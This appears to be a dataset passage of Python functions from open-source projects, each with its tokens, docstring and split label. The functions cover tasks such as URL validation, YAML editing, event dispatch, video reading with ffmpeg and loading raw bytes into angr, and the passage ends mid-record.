def url_syntax_check(url): # pragma: no cover """ Check the syntax of the given URL. :param url: The URL to check the syntax for. :type url: str :return: The syntax validity. :rtype: bool .. warning:: If an empty or a non-string :code:`url` is given, we return :code:`None`. """ if url and isinstance(url, str): # The given URL is not empty nor None. # and # * The given URL is a string. # We silently load the configuration. load_config(True) return Check(url).is_url_valid() # We return None, there is nothing to check. return None
[ "def", "url_syntax_check", "(", "url", ")", ":", "# pragma: no cover", "if", "url", "and", "isinstance", "(", "url", ",", "str", ")", ":", "# The given URL is not empty nor None.", "# and", "# * The given URL is a string.", "# We silently load the configuration.", "load_config", "(", "True", ")", "return", "Check", "(", "url", ")", ".", "is_url_valid", "(", ")", "# We return None, there is nothing to check.", "return", "None" ]
Check the syntax of the given URL. :param url: The URL to check the syntax for. :type url: str :return: The syntax validity. :rtype: bool .. warning:: If an empty or a non-string :code:`url` is given, we return :code:`None`.
[ "Check", "the", "syntax", "of", "the", "given", "URL", "." ]
python
test
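Called through the package namespace, as the function lives in PyFunceble's `__init__`:

import PyFunceble

print(PyFunceble.url_syntax_check('https://example.org/path'))  # True
print(PyFunceble.url_syntax_check(''))                          # None (nothing to check)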
radujica/baloo
baloo/core/indexes/multi.py
https://github.com/radujica/baloo/blob/f6e05e35b73a75e8a300754c6bdc575e5f2d53b9/baloo/core/indexes/multi.py#L213-L225
def dropna(self): """Returns MultiIndex without any rows containing null values according to Baloo's convention. Returns ------- MultiIndex MultiIndex with no null values. """ not_nas = [v.notna() for v in self.values] and_filter = reduce(lambda x, y: x & y, not_nas) return self[and_filter]
[ "def", "dropna", "(", "self", ")", ":", "not_nas", "=", "[", "v", ".", "notna", "(", ")", "for", "v", "in", "self", ".", "values", "]", "and_filter", "=", "reduce", "(", "lambda", "x", ",", "y", ":", "x", "&", "y", ",", "not_nas", ")", "return", "self", "[", "and_filter", "]" ]
Returns MultiIndex without any rows containing null values according to Baloo's convention. Returns ------- MultiIndex MultiIndex with no null values.
[ "Returns", "MultiIndex", "without", "any", "rows", "containing", "null", "values", "according", "to", "Baloo", "s", "convention", "." ]
python
train
b3j0f/schema
b3j0f/schema/lang/python.py
https://github.com/b3j0f/schema/blob/1c88c23337f5fef50254e65bd407112c43396dd9/b3j0f/schema/lang/python.py#L108-L121
def buildschema(_cls=None, **kwargs): """Class decorator used to build a schema from the decorate class. :param type _cls: class to decorate. :param kwargs: schema attributes to set. :rtype: type :return: schema class. """ if _cls is None: return lambda _cls: buildschema(_cls=_cls, **kwargs) result = build(_cls, **kwargs) return result
[ "def", "buildschema", "(", "_cls", "=", "None", ",", "*", "*", "kwargs", ")", ":", "if", "_cls", "is", "None", ":", "return", "lambda", "_cls", ":", "buildschema", "(", "_cls", "=", "_cls", ",", "*", "*", "kwargs", ")", "result", "=", "build", "(", "_cls", ",", "*", "*", "kwargs", ")", "return", "result" ]
Class decorator used to build a schema from the decorate class. :param type _cls: class to decorate. :param kwargs: schema attributes to set. :rtype: type :return: schema class.
[ "Class", "decorator", "used", "to", "build", "a", "schema", "from", "the", "decorate", "class", "." ]
python
train
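Both decorator forms work, since a bare class goes straight to `build()` while keyword-only use returns a decorator:

@buildschema
class Person(object):
    name = ''

@buildschema(name='custom')
class Address(object):
    street = ''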
crdoconnor/strictyaml
strictyaml/yamllocation.py
https://github.com/crdoconnor/strictyaml/blob/efdac7f89e81679fc95686288cd32b9563fde609/strictyaml/yamllocation.py#L130-L145
def fork(self, strictindex, new_value): """ Return a chunk referring to the same location in a duplicated document. Used when modifying a YAML chunk so that the modification can be validated before changing it. """ forked_chunk = YAMLChunk( deepcopy(self._ruamelparsed), pointer=self.pointer, label=self.label, key_association=copy(self._key_association), ) forked_chunk.contents[self.ruamelindex(strictindex)] = new_value.as_marked_up() forked_chunk.strictparsed()[strictindex] = deepcopy(new_value.as_marked_up()) return forked_chunk
[ "def", "fork", "(", "self", ",", "strictindex", ",", "new_value", ")", ":", "forked_chunk", "=", "YAMLChunk", "(", "deepcopy", "(", "self", ".", "_ruamelparsed", ")", ",", "pointer", "=", "self", ".", "pointer", ",", "label", "=", "self", ".", "label", ",", "key_association", "=", "copy", "(", "self", ".", "_key_association", ")", ",", ")", "forked_chunk", ".", "contents", "[", "self", ".", "ruamelindex", "(", "strictindex", ")", "]", "=", "new_value", ".", "as_marked_up", "(", ")", "forked_chunk", ".", "strictparsed", "(", ")", "[", "strictindex", "]", "=", "deepcopy", "(", "new_value", ".", "as_marked_up", "(", ")", ")", "return", "forked_chunk" ]
Return a chunk referring to the same location in a duplicated document. Used when modifying a YAML chunk so that the modification can be validated before changing it.
[ "Return", "a", "chunk", "referring", "to", "the", "same", "location", "in", "a", "duplicated", "document", "." ]
python
train
KelSolaar/Umbra
umbra/ui/views.py
https://github.com/KelSolaar/Umbra/blob/66f45f08d9d723787f1191989f8b0dda84b412ce/umbra/ui/views.py#L309-L340
def get_view_nodes_from_indexes(self, *indexes): """ Returns the View Nodes from given indexes. :param view: View. :type view: QWidget :param \*indexes: Indexes. :type \*indexes: list :return: View nodes. :rtype: dict """ nodes = {} model = self.model() if not model: return nodes if not hasattr(model, "get_node"): raise NotImplementedError( "{0} | '{1}' Model doesn't implement a 'get_node' method!".format(__name__, model)) if not hasattr(model, "get_attribute"): raise NotImplementedError( "{0} | '{1}' Model doesn't implement a 'get_attribute' method!".format(__name__, model)) for index in indexes: node = model.get_node(index) if not node in nodes: nodes[node] = [] attribute = model.get_attribute(node, index.column()) attribute and nodes[node].append(attribute) return nodes
[ "def", "get_view_nodes_from_indexes", "(", "self", ",", "*", "indexes", ")", ":", "nodes", "=", "{", "}", "model", "=", "self", ".", "model", "(", ")", "if", "not", "model", ":", "return", "nodes", "if", "not", "hasattr", "(", "model", ",", "\"get_node\"", ")", ":", "raise", "NotImplementedError", "(", "\"{0} | '{1}' Model doesn't implement a 'get_node' method!\"", ".", "format", "(", "__name__", ",", "model", ")", ")", "if", "not", "hasattr", "(", "model", ",", "\"get_attribute\"", ")", ":", "raise", "NotImplementedError", "(", "\"{0} | '{1}' Model doesn't implement a 'get_attribute' method!\"", ".", "format", "(", "__name__", ",", "model", ")", ")", "for", "index", "in", "indexes", ":", "node", "=", "model", ".", "get_node", "(", "index", ")", "if", "not", "node", "in", "nodes", ":", "nodes", "[", "node", "]", "=", "[", "]", "attribute", "=", "model", ".", "get_attribute", "(", "node", ",", "index", ".", "column", "(", ")", ")", "attribute", "and", "nodes", "[", "node", "]", ".", "append", "(", "attribute", ")", "return", "nodes" ]
Returns the View Nodes from given indexes. :param view: View. :type view: QWidget :param \*indexes: Indexes. :type \*indexes: list :return: View nodes. :rtype: dict
[ "Returns", "the", "View", "Nodes", "from", "given", "indexes", "." ]
python
train
Cymmetria/honeycomb
honeycomb/utils/config_utils.py
https://github.com/Cymmetria/honeycomb/blob/33ea91b5cf675000e4e85dd02efe580ea6e95c86/honeycomb/utils/config_utils.py#L49-L57
def validate_config_parameters(config_json, allowed_keys, allowed_types): """Validate parameters in config file.""" custom_fields = config_json.get(defs.PARAMETERS, []) for field in custom_fields: validate_field(field, allowed_keys, allowed_types) default = field.get(defs.DEFAULT) field_type = field.get(defs.TYPE) if default: validate_field_matches_type(field[defs.VALUE], default, field_type)
[ "def", "validate_config_parameters", "(", "config_json", ",", "allowed_keys", ",", "allowed_types", ")", ":", "custom_fields", "=", "config_json", ".", "get", "(", "defs", ".", "PARAMETERS", ",", "[", "]", ")", "for", "field", "in", "custom_fields", ":", "validate_field", "(", "field", ",", "allowed_keys", ",", "allowed_types", ")", "default", "=", "field", ".", "get", "(", "defs", ".", "DEFAULT", ")", "field_type", "=", "field", ".", "get", "(", "defs", ".", "TYPE", ")", "if", "default", ":", "validate_field_matches_type", "(", "field", "[", "defs", ".", "VALUE", "]", ",", "default", ",", "field_type", ")" ]
Validate parameters in config file.
[ "Validate", "parameters", "in", "config", "file", "." ]
python
train
nameko/nameko
nameko/events.py
https://github.com/nameko/nameko/blob/88d7e5211de4fcc1c34cd7f84d7c77f0619c5f5d/nameko/events.py#L86-L99
def get_dependency(self, worker_ctx): """ Inject a dispatch method onto the service instance """ extra_headers = self.get_message_headers(worker_ctx) def dispatch(event_type, event_data): self.publisher.publish( event_data, exchange=self.exchange, routing_key=event_type, extra_headers=extra_headers ) return dispatch
[ "def", "get_dependency", "(", "self", ",", "worker_ctx", ")", ":", "extra_headers", "=", "self", ".", "get_message_headers", "(", "worker_ctx", ")", "def", "dispatch", "(", "event_type", ",", "event_data", ")", ":", "self", ".", "publisher", ".", "publish", "(", "event_data", ",", "exchange", "=", "self", ".", "exchange", ",", "routing_key", "=", "event_type", ",", "extra_headers", "=", "extra_headers", ")", "return", "dispatch" ]
Inject a dispatch method onto the service instance
[ "Inject", "a", "dispatch", "method", "onto", "the", "service", "instance" ]
python
train
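Standard dispatcher usage in a nameko service; `self.dispatch` below is exactly the closure returned by `get_dependency()`:

from nameko.events import EventDispatcher
from nameko.rpc import rpc

class OrderService(object):
    name = 'orders'
    dispatch = EventDispatcher()

    @rpc
    def place_order(self, order_id):
        self.dispatch('order_placed', {'id': order_id})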
aiortc/aioice
aioice/ice.py
https://github.com/aiortc/aioice/blob/a04d810d94ec2d00eca9ce01eacca74b3b086616/aioice/ice.py#L33-L46
def get_host_addresses(use_ipv4, use_ipv6): """ Get local IP addresses. """ addresses = [] for interface in netifaces.interfaces(): ifaddresses = netifaces.ifaddresses(interface) for address in ifaddresses.get(socket.AF_INET, []): if use_ipv4 and address['addr'] != '127.0.0.1': addresses.append(address['addr']) for address in ifaddresses.get(socket.AF_INET6, []): if use_ipv6 and address['addr'] != '::1' and '%' not in address['addr']: addresses.append(address['addr']) return addresses
[ "def", "get_host_addresses", "(", "use_ipv4", ",", "use_ipv6", ")", ":", "addresses", "=", "[", "]", "for", "interface", "in", "netifaces", ".", "interfaces", "(", ")", ":", "ifaddresses", "=", "netifaces", ".", "ifaddresses", "(", "interface", ")", "for", "address", "in", "ifaddresses", ".", "get", "(", "socket", ".", "AF_INET", ",", "[", "]", ")", ":", "if", "use_ipv4", "and", "address", "[", "'addr'", "]", "!=", "'127.0.0.1'", ":", "addresses", ".", "append", "(", "address", "[", "'addr'", "]", ")", "for", "address", "in", "ifaddresses", ".", "get", "(", "socket", ".", "AF_INET6", ",", "[", "]", ")", ":", "if", "use_ipv6", "and", "address", "[", "'addr'", "]", "!=", "'::1'", "and", "'%'", "not", "in", "address", "[", "'addr'", "]", ":", "addresses", ".", "append", "(", "address", "[", "'addr'", "]", ")", "return", "addresses" ]
Get local IP addresses.
[ "Get", "local", "IP", "addresses", "." ]
python
train
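A direct call; the result depends on the machine's interfaces:

addresses = get_host_addresses(use_ipv4=True, use_ipv6=False)
print(addresses)  # e.g. ['192.168.1.23'] -- loopback is excluded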
jim-easterbrook/pyctools
src/pyctools/components/io/videofilereader.py
https://github.com/jim-easterbrook/pyctools/blob/2a958665326892f45f249bebe62c2c23f306732b/src/pyctools/components/io/videofilereader.py#L78-L135
def file_reader(self): """Generator process to read file""" self.update_config() path = self.config['path'] # open file to get dimensions with self.subprocess( ['ffmpeg', '-v', 'info', '-y', '-an', '-vn', '-i', path, '-'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open(os.devnull), universal_newlines=True) as sp: for line in sp.stderr.read().splitlines(): match = re.search('(\d{2,})x(\d{2,})', line) if match: xlen, ylen = map(int, match.groups()) break else: self.logger.critical('Failed to open %s', path) return # read file repeatedly to allow looping while True: # can change config once per outer loop self.update_config() bit16 = self.config['16bit'] self.frame_type = self.config['type'] self.metadata = Metadata().from_file(path) audit = self.metadata.get('audit') audit += 'data = %s\n' % path audit += ' type: %s, 16bit: %s\n' % (self.frame_type, bit16) self.metadata.set('audit', audit) bps = {'RGB': 3, 'Y': 1}[self.frame_type] pix_fmt = {'RGB': ('rgb24', 'rgb48le'), 'Y': ('gray', 'gray16le')}[self.frame_type][bit16] bytes_per_line = xlen * ylen * bps if bit16: bytes_per_line *= 2 # open file to read data with self.subprocess( ['ffmpeg', '-v', 'warning', '-an', '-i', path, '-f', 'image2pipe', '-pix_fmt', pix_fmt, '-c:v', 'rawvideo', '-'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open(os.devnull), bufsize=bytes_per_line) as sp: while True: try: raw_data = sp.stdout.read(bytes_per_line) except Exception as ex: self.logger.exception(ex) return if len(raw_data) < bytes_per_line: break if bit16: image = numpy.fromstring(raw_data, dtype=numpy.uint16) image = image.astype(pt_float) / pt_float(256.0) else: image = numpy.fromstring(raw_data, dtype=numpy.uint8) yield image.reshape((ylen, xlen, bps)) self.update_config() if self.frame_no == 0 or self.config['looping'] == 'off': return
[ "def", "file_reader", "(", "self", ")", ":", "self", ".", "update_config", "(", ")", "path", "=", "self", ".", "config", "[", "'path'", "]", "# open file to get dimensions", "with", "self", ".", "subprocess", "(", "[", "'ffmpeg'", ",", "'-v'", ",", "'info'", ",", "'-y'", ",", "'-an'", ",", "'-vn'", ",", "'-i'", ",", "path", ",", "'-'", "]", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ",", "stdin", "=", "open", "(", "os", ".", "devnull", ")", ",", "universal_newlines", "=", "True", ")", "as", "sp", ":", "for", "line", "in", "sp", ".", "stderr", ".", "read", "(", ")", ".", "splitlines", "(", ")", ":", "match", "=", "re", ".", "search", "(", "'(\\d{2,})x(\\d{2,})'", ",", "line", ")", "if", "match", ":", "xlen", ",", "ylen", "=", "map", "(", "int", ",", "match", ".", "groups", "(", ")", ")", "break", "else", ":", "self", ".", "logger", ".", "critical", "(", "'Failed to open %s'", ",", "path", ")", "return", "# read file repeatedly to allow looping", "while", "True", ":", "# can change config once per outer loop", "self", ".", "update_config", "(", ")", "bit16", "=", "self", ".", "config", "[", "'16bit'", "]", "self", ".", "frame_type", "=", "self", ".", "config", "[", "'type'", "]", "self", ".", "metadata", "=", "Metadata", "(", ")", ".", "from_file", "(", "path", ")", "audit", "=", "self", ".", "metadata", ".", "get", "(", "'audit'", ")", "audit", "+=", "'data = %s\\n'", "%", "path", "audit", "+=", "' type: %s, 16bit: %s\\n'", "%", "(", "self", ".", "frame_type", ",", "bit16", ")", "self", ".", "metadata", ".", "set", "(", "'audit'", ",", "audit", ")", "bps", "=", "{", "'RGB'", ":", "3", ",", "'Y'", ":", "1", "}", "[", "self", ".", "frame_type", "]", "pix_fmt", "=", "{", "'RGB'", ":", "(", "'rgb24'", ",", "'rgb48le'", ")", ",", "'Y'", ":", "(", "'gray'", ",", "'gray16le'", ")", "}", "[", "self", ".", "frame_type", "]", "[", "bit16", "]", "bytes_per_line", "=", "xlen", "*", "ylen", "*", "bps", "if", "bit16", ":", "bytes_per_line", "*=", "2", "# open file to read data", "with", "self", ".", "subprocess", "(", "[", "'ffmpeg'", ",", "'-v'", ",", "'warning'", ",", "'-an'", ",", "'-i'", ",", "path", ",", "'-f'", ",", "'image2pipe'", ",", "'-pix_fmt'", ",", "pix_fmt", ",", "'-c:v'", ",", "'rawvideo'", ",", "'-'", "]", ",", "stdout", "=", "subprocess", ".", "PIPE", ",", "stderr", "=", "subprocess", ".", "PIPE", ",", "stdin", "=", "open", "(", "os", ".", "devnull", ")", ",", "bufsize", "=", "bytes_per_line", ")", "as", "sp", ":", "while", "True", ":", "try", ":", "raw_data", "=", "sp", ".", "stdout", ".", "read", "(", "bytes_per_line", ")", "except", "Exception", "as", "ex", ":", "self", ".", "logger", ".", "exception", "(", "ex", ")", "return", "if", "len", "(", "raw_data", ")", "<", "bytes_per_line", ":", "break", "if", "bit16", ":", "image", "=", "numpy", ".", "fromstring", "(", "raw_data", ",", "dtype", "=", "numpy", ".", "uint16", ")", "image", "=", "image", ".", "astype", "(", "pt_float", ")", "/", "pt_float", "(", "256.0", ")", "else", ":", "image", "=", "numpy", ".", "fromstring", "(", "raw_data", ",", "dtype", "=", "numpy", ".", "uint8", ")", "yield", "image", ".", "reshape", "(", "(", "ylen", ",", "xlen", ",", "bps", ")", ")", "self", ".", "update_config", "(", ")", "if", "self", ".", "frame_no", "==", "0", "or", "self", ".", "config", "[", "'looping'", "]", "==", "'off'", ":", "return" ]
Generator process to read file
[ "Generator", "process", "to", "read", "file" ]
python
train
arviz-devs/arviz
arviz/data/io_emcee.py
https://github.com/arviz-devs/arviz/blob/d04d8da07f029fd2931f48d2f7f324cf393e5277/arviz/data/io_emcee.py#L6-L58
def _verify_names(sampler, var_names, arg_names): """Make sure var_names and arg_names are assigned reasonably. This is meant to run before loading emcee objects into InferenceData. In case var_names or arg_names is None, will provide defaults. If they are not None, it verifies there are the right number of them. Throws a ValueError in case validation fails. Parameters ---------- sampler : emcee.EnsembleSampler Fitted emcee sampler var_names : list[str] or None Names for the emcee parameters arg_names : list[str] or None Names for the args/observations provided to emcee Returns ------- list[str], list[str] Defaults for var_names and arg_names """ # There are 3 possible cases: emcee2, emcee3 and sampler read from h5 file (emcee3 only) if hasattr(sampler, "args"): num_vars = sampler.chain.shape[-1] num_args = len(sampler.args) elif hasattr(sampler, "log_prob_fn"): num_vars = sampler.get_chain().shape[-1] num_args = len(sampler.log_prob_fn.args) else: num_vars = sampler.get_chain().shape[-1] num_args = 0 # emcee only stores the posterior samples if var_names is None: var_names = ["var_{}".format(idx) for idx in range(num_vars)] if arg_names is None: arg_names = ["arg_{}".format(idx) for idx in range(num_args)] if len(var_names) != num_vars: raise ValueError( "The sampler has {} variables, but only {} var_names were provided!".format( num_vars, len(var_names) ) ) if len(arg_names) != num_args: raise ValueError( "The sampler has {} args, but only {} arg_names were provided!".format( num_args, len(arg_names) ) ) return var_names, arg_names
[ "def", "_verify_names", "(", "sampler", ",", "var_names", ",", "arg_names", ")", ":", "# There are 3 possible cases: emcee2, emcee3 and sampler read from h5 file (emcee3 only)", "if", "hasattr", "(", "sampler", ",", "\"args\"", ")", ":", "num_vars", "=", "sampler", ".", "chain", ".", "shape", "[", "-", "1", "]", "num_args", "=", "len", "(", "sampler", ".", "args", ")", "elif", "hasattr", "(", "sampler", ",", "\"log_prob_fn\"", ")", ":", "num_vars", "=", "sampler", ".", "get_chain", "(", ")", ".", "shape", "[", "-", "1", "]", "num_args", "=", "len", "(", "sampler", ".", "log_prob_fn", ".", "args", ")", "else", ":", "num_vars", "=", "sampler", ".", "get_chain", "(", ")", ".", "shape", "[", "-", "1", "]", "num_args", "=", "0", "# emcee only stores the posterior samples", "if", "var_names", "is", "None", ":", "var_names", "=", "[", "\"var_{}\"", ".", "format", "(", "idx", ")", "for", "idx", "in", "range", "(", "num_vars", ")", "]", "if", "arg_names", "is", "None", ":", "arg_names", "=", "[", "\"arg_{}\"", ".", "format", "(", "idx", ")", "for", "idx", "in", "range", "(", "num_args", ")", "]", "if", "len", "(", "var_names", ")", "!=", "num_vars", ":", "raise", "ValueError", "(", "\"The sampler has {} variables, but only {} var_names were provided!\"", ".", "format", "(", "num_vars", ",", "len", "(", "var_names", ")", ")", ")", "if", "len", "(", "arg_names", ")", "!=", "num_args", ":", "raise", "ValueError", "(", "\"The sampler has {} args, but only {} arg_names were provided!\"", ".", "format", "(", "num_args", ",", "len", "(", "arg_names", ")", ")", ")", "return", "var_names", ",", "arg_names" ]
Make sure var_names and arg_names are assigned reasonably. This is meant to run before loading emcee objects into InferenceData. In case var_names or arg_names is None, will provide defaults. If they are not None, it verifies there are the right number of them. Throws a ValueError in case validation fails. Parameters ---------- sampler : emcee.EnsembleSampler Fitted emcee sampler var_names : list[str] or None Names for the emcee parameters arg_names : list[str] or None Names for the args/observations provided to emcee Returns ------- list[str], list[str] Defaults for var_names and arg_names
[ "Make", "sure", "var_names", "and", "arg_names", "are", "assigned", "reasonably", "." ]
python
train
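The validation runs when converting a fitted sampler via the public API; here `sampler` is assumed to be an already-run emcee.EnsembleSampler over three parameters:

import arviz as az

idata = az.from_emcee(sampler, var_names=['m', 'b', 'log_sigma'])
# a wrong-length var_names list raises ValueError before any conversion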
flowersteam/explauto
explauto/sensorimotor_model/inverse/cma.py
https://github.com/flowersteam/explauto/blob/cf0f81ecb9f6412f7276a95bd27359000e1e26b6/explauto/sensorimotor_model/inverse/cma.py#L8577-L8579
def felli(x): """unbound test function, needed to test multiprocessor""" return sum(1e6**(np.arange(len(x)) / (len(x) - 1)) * (np.array(x, copy=False))**2)
[ "def", "felli", "(", "x", ")", ":", "return", "sum", "(", "1e6", "**", "(", "np", ".", "arange", "(", "len", "(", "x", ")", ")", "/", "(", "len", "(", "x", ")", "-", "1", ")", ")", "*", "(", "np", ".", "array", "(", "x", ",", "copy", "=", "False", ")", ")", "**", "2", ")" ]
unbound test function, needed to test multiprocessor
[ "unbound", "test", "function", "needed", "to", "test", "multiprocessor" ]
python
train
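A direct evaluation; the per-axis weights grow geometrically from 1 up to 1e6 across dimensions, which is what makes the function ill-conditioned:

print(felli([1.0, 2.0, 3.0]))  # scalar; dominated by the last, most heavily weighted axis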
cloud9ers/gurumate
environment/lib/python2.7/site-packages/IPython/core/extensions.py
https://github.com/cloud9ers/gurumate/blob/075dc74d1ee62a8c6b7a8bf2b271364f01629d1e/environment/lib/python2.7/site-packages/IPython/core/extensions.py#L130-L157
def install_extension(self, url, filename=None): """Download and install an IPython extension. If filename is given, the file will be so named (inside the extension directory). Otherwise, the name from the URL will be used. The file must have a .py or .zip extension; otherwise, a ValueError will be raised. Returns the full path to the installed file. """ # Ensure the extension directory exists if not os.path.isdir(self.ipython_extension_dir): os.makedirs(self.ipython_extension_dir, mode = 0777) if os.path.isfile(url): src_filename = os.path.basename(url) copy = copyfile else: src_filename = urlparse(url).path.split('/')[-1] copy = urlretrieve if filename is None: filename = src_filename if os.path.splitext(filename)[1] not in ('.py', '.zip'): raise ValueError("The file must have a .py or .zip extension", filename) filename = os.path.join(self.ipython_extension_dir, filename) copy(url, filename) return filename
[ "def", "install_extension", "(", "self", ",", "url", ",", "filename", "=", "None", ")", ":", "# Ensure the extension directory exists", "if", "not", "os", ".", "path", ".", "isdir", "(", "self", ".", "ipython_extension_dir", ")", ":", "os", ".", "makedirs", "(", "self", ".", "ipython_extension_dir", ",", "mode", "=", "0777", ")", "if", "os", ".", "path", ".", "isfile", "(", "url", ")", ":", "src_filename", "=", "os", ".", "path", ".", "basename", "(", "url", ")", "copy", "=", "copyfile", "else", ":", "src_filename", "=", "urlparse", "(", "url", ")", ".", "path", ".", "split", "(", "'/'", ")", "[", "-", "1", "]", "copy", "=", "urlretrieve", "if", "filename", "is", "None", ":", "filename", "=", "src_filename", "if", "os", ".", "path", ".", "splitext", "(", "filename", ")", "[", "1", "]", "not", "in", "(", "'.py'", ",", "'.zip'", ")", ":", "raise", "ValueError", "(", "\"The file must have a .py or .zip extension\"", ",", "filename", ")", "filename", "=", "os", ".", "path", ".", "join", "(", "self", ".", "ipython_extension_dir", ",", "filename", ")", "copy", "(", "url", ",", "filename", ")", "return", "filename" ]
Download and install an IPython extension. If filename is given, the file will be so named (inside the extension directory). Otherwise, the name from the URL will be used. The file must have a .py or .zip extension; otherwise, a ValueError will be raised. Returns the full path to the installed file.
[ "Download", "and", "install", "an", "IPython", "extension", ".", "If", "filename", "is", "given", "the", "file", "will", "be", "so", "named", "(", "inside", "the", "extension", "directory", ")", ".", "Otherwise", "the", "name", "from", "the", "URL", "will", "be", "used", ".", "The", "file", "must", "have", "a", ".", "py", "or", ".", "zip", "extension", ";", "otherwise", "a", "ValueError", "will", "be", "raised", ".", "Returns", "the", "full", "path", "to", "the", "installed", "file", "." ]
python
test
siznax/wptools
wptools/page.py
https://github.com/siznax/wptools/blob/100eaea585c34aa9ad87a9eda8982bb4898f6ec9/wptools/page.py#L472-L481
def _update_params(self): """ update params from response data """ if self.data.get('title'): self.params['title'] = self.data.get('title') if self.data.get('pageid'): self.params['pageid'] = self.data.get('pageid') if self.data.get('wikibase'): self.params['wikibase'] = self.data.get('wikibase')
[ "def", "_update_params", "(", "self", ")", ":", "if", "self", ".", "data", ".", "get", "(", "'title'", ")", ":", "self", ".", "params", "[", "'title'", "]", "=", "self", ".", "data", ".", "get", "(", "'title'", ")", "if", "self", ".", "data", ".", "get", "(", "'pageid'", ")", ":", "self", ".", "params", "[", "'pageid'", "]", "=", "self", ".", "data", ".", "get", "(", "'pageid'", ")", "if", "self", ".", "data", ".", "get", "(", "'wikibase'", ")", ":", "self", ".", "params", "[", "'wikibase'", "]", "=", "self", ".", "data", ".", "get", "(", "'wikibase'", ")" ]
update params from response data
[ "update", "params", "from", "response", "data" ]
python
train
trendels/rhino
rhino/request.py
https://github.com/trendels/rhino/blob/f1f0ef21b6080a2bd130b38b5bef163074c94aed/rhino/request.py#L364-L370
def input(self):
    """Returns a file-like object representing the request body."""
    if self._input is None:
        input_file = self.environ['wsgi.input']
        content_length = self.content_length or 0
        self._input = WsgiInput(input_file, content_length)
    return self._input
[ "def", "input", "(", "self", ")", ":", "if", "self", ".", "_input", "is", "None", ":", "input_file", "=", "self", ".", "environ", "[", "'wsgi.input'", "]", "content_length", "=", "self", ".", "content_length", "or", "0", "self", ".", "_input", "=", "WsgiInput", "(", "input_file", ",", "self", ".", "content_length", ")", "return", "self", ".", "_input" ]
Returns a file-like object representing the request body.
[ "Returns", "a", "file", "-", "like", "object", "representing", "the", "request", "body", "." ]
python
train
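The property above is a memoizing accessor: the wrapper is built once, on first access, and reused afterwards. A self-contained sketch of the same pattern, with rhino's WsgiInput stubbed out as a tuple so it runs anywhere:

import io

class FakeRequest:
    """Minimal stand-in for the request class; not rhino's real class."""
    def __init__(self, environ):
        self.environ = environ
        self._input = None
        self.content_length = int(environ.get('CONTENT_LENGTH') or 0)

    @property
    def input(self):
        if self._input is None:  # build the wrapper only once
            self._input = (self.environ['wsgi.input'], self.content_length)
        return self._input

req = FakeRequest({'wsgi.input': io.BytesIO(b'hello'), 'CONTENT_LENGTH': '5'})
assert req.input is req.input  # cached: same object on every access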
angr/angr
angr/project.py
https://github.com/angr/angr/blob/4e2f97d56af5419ee73bdb30482c8dd8ff5f3e40/angr/project.py#L17-L34
def load_shellcode(shellcode, arch, start_offset=0, load_address=0):
    """
    Load a new project based on a string of raw bytecode.

    :param shellcode: The data to load
    :param arch: The name of the arch to use, or an archinfo class
    :param start_offset: The offset into the data to start analysis (default 0)
    :param load_address: The address to place the data in memory (default 0)
    """
    return Project(
        BytesIO(shellcode),
        main_opts={
            'backend': 'blob',
            'arch': arch,
            'entry_point': start_offset,
            'base_addr': load_address,
        }
    )
[ "def", "load_shellcode", "(", "shellcode", ",", "arch", ",", "start_offset", "=", "0", ",", "load_address", "=", "0", ")", ":", "return", "Project", "(", "BytesIO", "(", "shellcode", ")", ",", "main_opts", "=", "{", "'backend'", ":", "'blob'", ",", "'arch'", ":", "arch", ",", "'entry_point'", ":", "start_offset", ",", "'base_addr'", ":", "load_address", ",", "}", ")" ]
Load a new project based on a string of raw bytecode.

:param shellcode: The data to load
:param arch: The name of the arch to use, or an archinfo class
:param start_offset: The offset into the data to start analysis (default 0)
:param load_address: The address to place the data in memory (default 0)
[ "Load", "a", "new", "project", "based", "on", "a", "string", "of", "raw", "bytecode", "." ]
python
train
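A hedged usage sketch; it assumes angr is installed and re-exports load_shellcode at package level, which the module path above suggests.

import angr

# Two x86-64 NOPs followed by RET, mapped at 0x400000.
proj = angr.load_shellcode(b'\x90\x90\xc3', arch='amd64', load_address=0x400000)
block = proj.factory.block(0x400000)
block.pp()  # disassembly of the three instructions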
bcbio/bcbio-nextgen
bcbio/distributed/resources.py
https://github.com/bcbio/bcbio-nextgen/blob/6a9348c0054ccd5baffd22f1bb7d0422f6978b20/bcbio/distributed/resources.py#L119-L130
def _scale_jobs_to_memory(jobs, mem_per_core, sysinfo):
    """When scheduling jobs with single cores, avoid overscheduling due to memory.
    """
    if "cores" not in sysinfo:
        return jobs, 1.0
    sys_mem_per_core = float(sysinfo["memory"]) / float(sysinfo["cores"])
    if sys_mem_per_core < mem_per_core:
        pct = sys_mem_per_core / float(mem_per_core)
        target_jobs = int(math.floor(jobs * pct))
        return max(target_jobs, 1), pct
    else:
        return jobs, 1.0
[ "def", "_scale_jobs_to_memory", "(", "jobs", ",", "mem_per_core", ",", "sysinfo", ")", ":", "if", "\"cores\"", "not", "in", "sysinfo", ":", "return", "jobs", ",", "1.0", "sys_mem_per_core", "=", "float", "(", "sysinfo", "[", "\"memory\"", "]", ")", "/", "float", "(", "sysinfo", "[", "\"cores\"", "]", ")", "if", "sys_mem_per_core", "<", "mem_per_core", ":", "pct", "=", "sys_mem_per_core", "/", "float", "(", "mem_per_core", ")", "target_jobs", "=", "int", "(", "math", ".", "floor", "(", "jobs", "*", "pct", ")", ")", "return", "max", "(", "target_jobs", ",", "1", ")", ",", "pct", "else", ":", "return", "jobs", ",", "1.0" ]
When scheduling jobs with single cores, avoid overscheduling due to memory.
[ "When", "scheduling", "jobs", "with", "single", "cores", "avoid", "overscheduling", "due", "to", "memory", "." ]
python
train
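A worked example of the arithmetic above, re-implemented inline so it runs without bcbio:

import math

def scale_jobs(jobs, mem_per_core, sysinfo):
    # mirrors _scale_jobs_to_memory above
    if "cores" not in sysinfo:
        return jobs, 1.0
    sys_mem_per_core = float(sysinfo["memory"]) / float(sysinfo["cores"])
    if sys_mem_per_core < mem_per_core:
        pct = sys_mem_per_core / float(mem_per_core)
        return max(int(math.floor(jobs * pct)), 1), pct
    return jobs, 1.0

# 16Gb over 8 cores gives 2Gb per core; asking for 4Gb per core halves the jobs.
print(scale_jobs(8, 4.0, {"memory": 16, "cores": 8}))  # -> (4, 0.5)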
gbiggs/rtsprofile
rtsprofile/targets.py
https://github.com/gbiggs/rtsprofile/blob/fded6eddcb0b25fe9808b1b12336a4413ea00905/rtsprofile/targets.py#L160-L172
def to_dict(self):
    '''Save this target component into a dictionary.'''
